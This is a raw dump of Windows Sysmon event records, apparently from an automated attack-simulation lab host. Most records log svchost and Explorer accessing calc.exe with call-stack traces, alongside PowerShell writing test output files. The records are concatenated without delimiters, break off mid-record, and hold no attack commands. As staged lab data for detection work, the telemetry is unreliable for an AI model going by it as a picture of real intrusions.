22:13:28.538{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 13241300x8000000000000000362040Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:13:28.538{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\cmd.exeBinary Data 10341000x8000000000000000362039Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.538{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 11241100x8000000000000000362038Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.538{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-01-28 22:13:27.803 11241100x8000000000000000362037Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.538{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-01-28 22:13:27.803 10341000x8000000000000000362036Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362035Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55324628C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362034Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362033Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362032Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362031Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362030Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362029Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55324628C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362028Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55324628C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362027Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+374d7|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362026Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362025Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55324628C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+37271|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362024Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55324628C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362023Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-337b-6013-8402-000000001100}16567404C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+1dbfa|C:\Windows\System32\NPSMDesktopProvider.dll+139e2|C:\Windows\System32\NPSMDesktopProvider.dll+1415b|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362022Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55324628C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362021Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-337b-6013-8402-000000001100}16569740C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\TaskFlowDataEngine.dll+cded0|C:\Windows\System32\TaskFlowDataEngine.dll+971db|C:\Windows\System32\TaskFlowDataEngine.dll+9685f|C:\Windows\System32\TaskFlowDataEngine.dll+96359|C:\Windows\System32\TaskFlowDataEngine.dll+95d85|C:\Windows\System32\TaskFlowDataEngine.dll+93be5|C:\Windows\System32\TaskFlowDataEngine.dll+925b8|C:\Windows\System32\TaskFlowDataEngine.dll+9cf11|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362020Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55324628C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362019Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362018Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362017Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 